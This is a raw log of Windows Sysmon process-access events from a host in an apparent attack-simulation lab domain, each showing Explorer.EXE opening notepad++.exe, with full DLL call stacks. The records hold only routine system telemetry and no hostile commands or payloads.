10341000x80000000000000001047129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.185{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000001047126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.185{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 